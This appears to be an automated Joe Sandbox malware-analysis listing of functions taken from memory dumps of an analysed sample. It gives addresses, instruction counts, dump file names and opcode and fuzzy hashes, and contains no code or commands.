                            • Instruction ID: 67509a2a6d9785f12700d9eb0da26998306bfd0f17385b508f59005c1525d394
                            • Opcode Fuzzy Hash: cc447f8448ca8993f84480214ce7b0b04d4f1e0901b3c11f3f49ed2f55a9fd94
                            • Instruction Fuzzy Hash: 48C09B714413155BDA11DB60F4C79D83761E7801157104315E40956515CA7E5D5B8F41
                            Function 01519DC0 Relevance: .0, Instructions: 9COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3482531fc4920e8f0adc3a3589ab14c6e7a857d2797b8584891ab03bb9613ca1
                            • Instruction ID: fb9ed53cfffd924164a7434dfd541c356997a584d457671ada4f79a88929e921
                            • Opcode Fuzzy Hash: 3482531fc4920e8f0adc3a3589ab14c6e7a857d2797b8584891ab03bb9613ca1
                            • Instruction Fuzzy Hash: 6BC08CB86002084FE3048F30D848A377AE3EBD8B01F41C418A60086228CE708840DB94
                            Function 01519070 Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 715fce523f669f2b76a65c94dd765c8f829c98e25b0dd51a95c46e388e11504b
                            • Instruction ID: 87dd7d3e6f1e9b320482224c109f0c9ac9d948cbbed4a08a94df0648851dca12
                            • Opcode Fuzzy Hash: 715fce523f669f2b76a65c94dd765c8f829c98e25b0dd51a95c46e388e11504b
                            • Instruction Fuzzy Hash: A3B0123000530E8FC501BB50F404504332DF6401087808520B40C152065D7C6C1187E5
                            Function 01519898 Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4cd9d0b1349765fa81d1a42e4d4f7bfd6c7a1cade6f50dcb3958171f3129ad40
                            • Instruction ID: 1ddeed4a933e050c4aa547af8c4c3fde25d359a82d26ff7e3e564ce735dd321d
                            • Opcode Fuzzy Hash: 4cd9d0b1349765fa81d1a42e4d4f7bfd6c7a1cade6f50dcb3958171f3129ad40
                            • Instruction Fuzzy Hash: B4B0127000530E4BD500FB50F406A14335CE780109B400120A00C15415DE7C7C554785

                            Non-executed Functions

                            Function 06B50040 Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: \Vrn
                            • API String ID: 0-2142071343
                            • Opcode ID: 373764a7c267ddd0317e94633d809f15e33ab9bf2cd7870a850dba3be37f8620
                            • Instruction ID: 38bf5e197069dcc1f753cfb2a6867ab2f5028ad01305df1489c38e126f9af783
                            • Opcode Fuzzy Hash: 373764a7c267ddd0317e94633d809f15e33ab9bf2cd7870a850dba3be37f8620
                            • Instruction Fuzzy Hash: FD02D6B0D00229CFDB60DFA8C885BDDBBB1BF49304F1495AAD809B7250EB749A85CF55
                            Function 05531AA9 Relevance: .8, Instructions: 787COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 87798fd7339890b526d074d0b4231989d656b55452fa7c75062e272f620b6728
                            • Instruction ID: 1631e6f2a9b52c688f1d5df0a03e4be81c02a35e5f534b20faaad7d6a1ef836c
                            • Opcode Fuzzy Hash: 87798fd7339890b526d074d0b4231989d656b55452fa7c75062e272f620b6728
                            • Instruction Fuzzy Hash: 5F620FB06102019BE748DF54D49876A7BE6FF89348FA4C95CC0099F392DFB6D90B8B91
                            Function 05531AB8 Relevance: .8, Instructions: 780COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ec9a9e23879855ae5e1680b0d1fd0d339c90755b4387251e6671b9968d8a7d4
                            • Instruction ID: 223f81df66a16b1063003e3663e8e09e549e3a3a397e7ea7b156cfd3f3c57ba7
                            • Opcode Fuzzy Hash: 0ec9a9e23879855ae5e1680b0d1fd0d339c90755b4387251e6671b9968d8a7d4
                            • Instruction Fuzzy Hash: 53620EB06102019BD748DF58D49876A7BE6FF89348FA4C95CC0099F392DFB6D90B8B91
                            Function 01512EC7 Relevance: .1, Instructions: 107COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3bde36e64d9080c259f462658cfbe1ca6c5165c56cf1dc6c1fa4dca4370a828e
                            • Instruction ID: 6898272e75816df512127e087a87a6bebf04ee0277398a41c9e91e78874c6266
                            • Opcode Fuzzy Hash: 3bde36e64d9080c259f462658cfbe1ca6c5165c56cf1dc6c1fa4dca4370a828e
                            • Instruction Fuzzy Hash: D2414430A05209DFEB05CFB8D498BEDBBB2FF4A310F145569E415BB2A1C735A881CB18
                            Function 01512ED8 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 385fc3ad16f427a1466618d395f1818b1338e2e0ec53e7688843ded85f3125aa
                            • Instruction ID: 6e7f3216975f04213b580945178cb830496765fe3fe3b5257bb97544b339508b
                            • Opcode Fuzzy Hash: 385fc3ad16f427a1466618d395f1818b1338e2e0ec53e7688843ded85f3125aa
                            • Instruction Fuzzy Hash: 70310574902218DFEB04DFA8D458BEDBBB2BF4A300F145468E415BB3A0CB359985CB18
                            Function 01512FE0 Relevance: .1, Instructions: 81COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0515df781a87918e5315b6694632fd22bbe7e8947e98cc32e3f8ac970a8d0412
                            • Instruction ID: 738123c090e4d614becbf35431a6f9530a71604fe51db1433630c500dc1101b2
                            • Opcode Fuzzy Hash: 0515df781a87918e5315b6694632fd22bbe7e8947e98cc32e3f8ac970a8d0412
                            • Instruction Fuzzy Hash: C531D434E05219DFDB05DFB8D484AEDBBB2BF4A300F14A469E415BB2A0C7359981CB18

                            Executed Functions

                            Function 011A0DA0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: .#_+
                            • API String ID: 0-3393013619
                            • Opcode ID: 96c1373523ae10f53a301ce00e02cf97d67d1ac1837e579ac412085194c328e1
                            • Instruction ID: f427f3e9594d7ad18b321fe42ee140da1da1ab67ef8deadf0307cef70226e33c
                            • Opcode Fuzzy Hash: 96c1373523ae10f53a301ce00e02cf97d67d1ac1837e579ac412085194c328e1
                            • Instruction Fuzzy Hash: E83199B9C052189FCB14CFA9E984AEEFBF0AB49310F24906AE814B7251D375A945CF64
                            Function 011A0DA8 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: .#_+
                            • API String ID: 0-3393013619
                            • Opcode ID: 2558aca8487b60245e66649b1b3a7e1068d4cd2fb9a949b64be757470a8fda46
                            • Instruction ID: 071afa3ebae838be3869c438eb04a326ba6b2669bfa1703a2033677e5ae4f306
                            • Opcode Fuzzy Hash: 2558aca8487b60245e66649b1b3a7e1068d4cd2fb9a949b64be757470a8fda46
                            • Instruction Fuzzy Hash: 3D31A9B9C052189FCB14CFA9E984ADEFBF0AB09310F24906AE814B7350D375AA45CF64
                            Function 011A0E88 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: x
                            • API String ID: 0-336484012
                            • Opcode ID: b0d4170b2919bb6885e0f24ad160e2760083b3d59696a174d02cd586afc90aef
                            • Instruction ID: a0c934b5c2cd060bb8a80cda7149193a834aaef5f3f1a9f405b7b8365013c863
                            • Opcode Fuzzy Hash: b0d4170b2919bb6885e0f24ad160e2760083b3d59696a174d02cd586afc90aef
                            • Instruction Fuzzy Hash: 38F090356492809FCB498A5D9410DAABFB6DBCA220318C1AFE888D7752C6368807CB51
                            Function 011A0562 Relevance: .7, Instructions: 710COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec7b78f54f5ad68be39bbf4d1f9e3d3230d1aac9c45cded8b5cc653f0cac302a
                            • Instruction ID: 1db1a2d8f70d94bb331efef754002d23a63a3a5b6ad6a8e99ef96aa370505c8f
                            • Opcode Fuzzy Hash: ec7b78f54f5ad68be39bbf4d1f9e3d3230d1aac9c45cded8b5cc653f0cac302a
                            • Instruction Fuzzy Hash: 980125B0C063489FCB06CFA8D8406EDBFB1AF06310F4549EAC485EB2A2E7754A45CB81
                            Function 011A04A7 Relevance: .5, Instructions: 464COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 577e0458612755d399d089a520ccc6178c1c779368f093199ae497b8767bc284
                            • Instruction ID: 39e887121a609d2a4913bd1a19484747e2c9f049fae519bcc818636dda22b1e4
                            • Opcode Fuzzy Hash: 577e0458612755d399d089a520ccc6178c1c779368f093199ae497b8767bc284
                            • Instruction Fuzzy Hash: BE419CB181E3D49FD7039B7898601D97FB0EF03214B5941EBC0C0DB1A3E66A495ACBA6
                            Function 011A0A40 Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d1faa8821b1ee8c2e3870b2741894067ad568bdeb8faaf5fc9d75edaac219a2
                            • Instruction ID: ffd5b3ef85df38db4a124c7c4834d6187fbb0b50638636bf6cacd9567ee615bb
                            • Opcode Fuzzy Hash: 3d1faa8821b1ee8c2e3870b2741894067ad568bdeb8faaf5fc9d75edaac219a2
                            • Instruction Fuzzy Hash: 2661D374A012089FCB09DFA9D994AEDBBF6FF8D310F108669E405AB265DB31AD05CF50
                            Function 011A0A32 Relevance: .1, Instructions: 76COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42bba87093f81b97386b30715450f890dcad371c30664bc4fe511289b0832f45
                            • Instruction ID: c89d9dc8988170708ac6f0e6100c9f64c8851591be18dc6e43abcedb68b1ad53
                            • Opcode Fuzzy Hash: 42bba87093f81b97386b30715450f890dcad371c30664bc4fe511289b0832f45
                            • Instruction Fuzzy Hash: F7312539D012088FDB08CFA9D9449EDBBF2EF89311F10816AE805A7254EB359A45CB50
                            Function 011A08A0 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 48aa2d371aaa827efb411a829c8b11dbc41a701a85740e3ca0fd1ac792f3f725
                            • Instruction ID: fbd6c7c972fca40f213ae54aa4d9d8d1de742ef7026fa1af1328ee87587b31ad
                            • Opcode Fuzzy Hash: 48aa2d371aaa827efb411a829c8b11dbc41a701a85740e3ca0fd1ac792f3f725
                            • Instruction Fuzzy Hash: CC211475D0020A9FCB05DFA8D440AEDFBB1FF49310F4186AAD460BB291EB30A946CB95
                            Function 00ECD01D Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012080907.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_ecd000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4622e67affcce58b132876fb2faf63ff541a764b93cb955ad9991b15451d22c5
                            • Instruction ID: 1d527c86fff98d61ca051088faba82ef391ebde9196703740b5253cd318ecc58
                            • Opcode Fuzzy Hash: 4622e67affcce58b132876fb2faf63ff541a764b93cb955ad9991b15451d22c5
                            • Instruction Fuzzy Hash: FF01A2715083409BE7108E29CE85F67FB99DF41324F18C46EED496A282C67B9942DAB2
                            Function 00ECD005 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012080907.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_ecd000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d862098ac1c78e7be8d85ef9ff552c21b4ffcdb55d7db0986908765b4221b98b
                            • Instruction ID: aa5e18c355d2f6c5ee8ee069ef8877f1f907852d6f9b364163652ae6d1be1392
                            • Opcode Fuzzy Hash: d862098ac1c78e7be8d85ef9ff552c21b4ffcdb55d7db0986908765b4221b98b
                            • Instruction Fuzzy Hash: 1001406100E3C05FE7128B258D94B52BFB4DF53224F1981DBD8889F1E3C26A5849C772
                            Function 011A0C78 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f27b69721cde9e2ce4d20a02d04d0d6d800c4e849700e1841288ae586b55189f
                            • Instruction ID: 77fcb49e94878b1268b4754da5070641f53980b8f374809444d5f2dc43b6a3eb
                            • Opcode Fuzzy Hash: f27b69721cde9e2ce4d20a02d04d0d6d800c4e849700e1841288ae586b55189f
                            • Instruction Fuzzy Hash: 5DF05874D04349AFDB48EFB9A0942ADBFF1EF9A204F5090AAD444E3201EB344641CF01
                            Function 011A0848 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4cb6c8540bb442199785ab4d95122d7806d17a1a4b8729fa9f9f7baf0c56cb24
                            • Instruction ID: 7c19d5a39347f9ca5b868f8b48c6ce8ed1edea7ed9e7297808887eb5754c9b64
                            • Opcode Fuzzy Hash: 4cb6c8540bb442199785ab4d95122d7806d17a1a4b8729fa9f9f7baf0c56cb24
                            • Instruction Fuzzy Hash: AAF0B274C01209EFCB45EFA8D840AAEBBB1FF09304F5046AAC855E7254EB715A44DF80
                            Function 011A09A8 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13457a4e9d630f9df938a810d11b64a57aba4ca2aed8896a958e7ea800940fc4
                            • Instruction ID: c07a4de917f7727be11c44d5e6f702a732fbeff39a20bed3d63d5418373153e5
                            • Opcode Fuzzy Hash: 13457a4e9d630f9df938a810d11b64a57aba4ca2aed8896a958e7ea800940fc4
                            • Instruction Fuzzy Hash: 9FE09274506288EFDB05DFB8EE14A9D7F72AB4A308F0046DDE888E7252E7751A14DB12
                            Function 011A09B8 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.2012889416.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_11a0000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dce7c3e61caef777caf20d0d674d1a8941cef1a04c6c7ca7bea1c23b2c0a4495
                            • Instruction ID: c5eed9af05ed7e025b5924d765dac34de57b00841a155ef0d37c7f8cb7200377
                            • Opcode Fuzzy Hash: dce7c3e61caef777caf20d0d674d1a8941cef1a04c6c7ca7bea1c23b2c0a4495
                            • Instruction Fuzzy Hash: 15E08674902208EFDB04EFB8E905B5D77B5EB46308F404558D80893200EB311E00DB41

                            Executed Functions

                            Function 00A404A7 Relevance: .8, Instructions: 823COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bbb6fe3ab5b547d2af7e516879f11ce28e0a8f2b62849a26fa54a2e4526e6348
                            • Instruction ID: 1dc40be42edbc0ec0593de2b2da7b021de47d59f741d98821f576b9cd1caf7af
                            • Opcode Fuzzy Hash: bbb6fe3ab5b547d2af7e516879f11ce28e0a8f2b62849a26fa54a2e4526e6348
                            • Instruction Fuzzy Hash: D441187181E3C59FD7439B748CA59997F70EE43204B1A85EBC480DF1A3DA39090EDBA6
                            Function 00A40540 Relevance: .4, Instructions: 373COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 521b91d007474d772b2f04fa0b19392ac9004deea95987e0f91fadbd13307adf
                            • Instruction ID: 8e07479e2094edb42b67cd1a944f4d975711563bf602631f5029edbb687f60ad
                            • Opcode Fuzzy Hash: 521b91d007474d772b2f04fa0b19392ac9004deea95987e0f91fadbd13307adf
                            • Instruction Fuzzy Hash: CA11393080A3859FCB06CF78D8655DDBF70EF43200B0986EBC041DB2A2EB340A19DB91
                            Function 00A40A40 Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a6ee470db9c27c897bc90212498cf14c190a09a535aed4581731bfc6cdc04c3
                            • Instruction ID: 96098e1bc27ce93e34b1578aa4fd3cd6207b3267f9781f0ad50d31e0a5ede17e
                            • Opcode Fuzzy Hash: 4a6ee470db9c27c897bc90212498cf14c190a09a535aed4581731bfc6cdc04c3
                            • Instruction Fuzzy Hash: EA61C074E012089FCB08DFA9D994AADBBF6FF89311F208569E405AB265DB30AD41DF50
                            Function 00A40DA0 Relevance: .1, Instructions: 80COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 80d456b37155f060333ac374ead612af55638c3e2b37f913d2ebe59927fddceb
                            • Instruction ID: 7b0a94e1ebf0c7e2d146e350b93b7190bac45c0ece1c22cae5fffca3758db0ff
                            • Opcode Fuzzy Hash: 80d456b37155f060333ac374ead612af55638c3e2b37f913d2ebe59927fddceb
                            • Instruction Fuzzy Hash: 1D31B9B9C052589FCB10CFA9E980ADEFBF0BB49310F24945AE814B7310C375A905CF64
                            Function 00A40DA8 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 82db289c871690ee7cb2703b02f5cd36428d1064d6a9ea40683186f61b0baf05
                            • Instruction ID: fae3ca45153792f15bbfdc0ff0eeb71db35df5e88801719bcb880a73f57a3558
                            • Opcode Fuzzy Hash: 82db289c871690ee7cb2703b02f5cd36428d1064d6a9ea40683186f61b0baf05
                            • Instruction Fuzzy Hash: BE31A8B9C012589FCB10CFA9E984A9EFBF0AB49310F24946AE814B7310D375AA45CB64
                            Function 00A40A32 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 195ef94dd353800335752c1bb378a7e5c114b956b887eb95e781aeebb62c34b7
                            • Instruction ID: cd5f834041fee66bbfa26bf3a73e1add9acecc35b5dc521a0ae09501be1ac997
                            • Opcode Fuzzy Hash: 195ef94dd353800335752c1bb378a7e5c114b956b887eb95e781aeebb62c34b7
                            • Instruction Fuzzy Hash: A4313435D01208DFCB04CFA9D884ADDBBF2FF89310F10866AD406AB264DB349A45DB60
                            Function 00A408A0 Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2257e979bb853593ad70fadca904db1459f364931fb6c6e72742c5b42f82ccea
                            • Instruction ID: 2adb8b5b2de6131d60a5f4f7d032ca270b9ae202867e09dfc2e5bef3149957b7
                            • Opcode Fuzzy Hash: 2257e979bb853593ad70fadca904db1459f364931fb6c6e72742c5b42f82ccea
                            • Instruction Fuzzy Hash: 65211931D0428A9FCB05DFA9C8509DDFBB1FF49314F4585AAD460BB2A1DB30AD06CB95
                            Function 009DD01D Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012267435.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_9dd000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a72acaf1173261a2b721cc03d05a208d78659743d9ea117e55a08fee91aae00
                            • Instruction ID: 5a91eab761716934faa453f026e3011cc29ca4fdbf3d84475057f54985dc94d3
                            • Opcode Fuzzy Hash: 7a72acaf1173261a2b721cc03d05a208d78659743d9ea117e55a08fee91aae00
                            • Instruction Fuzzy Hash: 5D01FD31446340ABE7209A22CC80B67BB9CEF81360F18C81BEC084B382C2799905CAB2
                            Function 009DD005 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012267435.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_9dd000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c36cd57f1308b232b13ee219d9423f24ec4223241c4dc173723c3773a14ca07
                            • Instruction ID: 4a2dac2631867f7011e012e11e235d73393b63fcbea62800bd3e7e589153b988
                            • Opcode Fuzzy Hash: 1c36cd57f1308b232b13ee219d9423f24ec4223241c4dc173723c3773a14ca07
                            • Instruction Fuzzy Hash: 4801406104E3C05FD7128B218D94B52BFA8AF52224F19C1DBD8888F2A3C2695849C772
                            Function 00A40E88 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd848e5113db1bf55e68ca457e2ae0fa375d3af39934943561de7b715ccf594f
                            • Instruction ID: 0b4210ec18d042aae173ef9fc28017592f5dca2295acc0f1d57f99975b3e783f
                            • Opcode Fuzzy Hash: fd848e5113db1bf55e68ca457e2ae0fa375d3af39934943561de7b715ccf594f
                            • Instruction Fuzzy Hash: 4AF0B43574E2409FD705CB29D504D6ABFB6EFCA220328C0AFE889CB312C6318C06DB10
                            Function 00A40840 Relevance: .0, Instructions: 31COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2012545762.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_a40000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8a293c0bf9a8cf18c740a456626056e311e4cd2ec552c9f4be2b810f2bfeb173
                            • Instruction ID: 55de7e1d53d36f21468dbb8b22c1faa49963b1f1d6898b5e418110d1758118dc
                            • Opcode Fuzzy Hash: 8a293c0bf9a8cf18c740a456626056e311e4cd2ec552c9f4be2b810f2bfeb173
                            • Instruction Fuzzy Hash: CBF0E270C14249DFCB45DFB8C880AAEBBB0FB45300F104AAAC415AB260EB714A54DF80
